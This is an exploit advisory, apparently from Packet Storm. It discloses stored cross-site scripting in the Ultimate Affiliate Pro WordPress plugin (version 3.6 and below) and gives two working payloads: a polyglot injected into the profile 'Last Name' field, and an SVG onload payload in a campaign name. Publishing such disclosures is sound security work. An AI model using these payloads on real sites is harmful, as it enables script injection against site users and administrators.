WordPress Ultimate Affiliate Pro plugin versions 3.6 and below suffer from a persistent cross site scripting vulnerability.
a9c2e3fb171f2a557f1f414f1374b2510df0bfc6492dda53411b1e527d16565e# Exploit Title: Ultimate Affiliate Pro WordPress Plugin <= v3.6 - Authenticated Stored XSS
# Date: 2017-07-24
# Exploit Author: 8bitsec
# Vendor Homepage: http://affiliate.wpindeed.com/
# Software Link: https://codecanyon.net/item/ultimate-affiliate-pro-wordpress-plugin/16527729
# Version: 3.6
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-07-24
Product & Service Introduction:
===============================
Ultimate Affiliate Pro is the newest and most completed Affiliate WordPress Plugin that allow you provide a premium platform for your Affiliates with different rewards and amounts based on Ranks or special Offers.
Technical Details & Description:
================================
Multiple Stored XSS vulnerabilities found logged as a low privileged user.
Proof of Concept (PoC):
=======================
Authenticated Stored XSS:
Logged as an affiliate, a low privileged user. Profile > Edit Account.
Write the payload in the 'Last Name' input area:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNMouseoVer=alert(document.domain) )
Other fields may be vulnerable.
Authenticated Stored XSS:
Logged as an affiliate, a low privileged user.
Marketing > Campaigns > Add New Campaign. Write the payload on the 'Name' input field:
<svg/onload=alert(document.domain)>
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed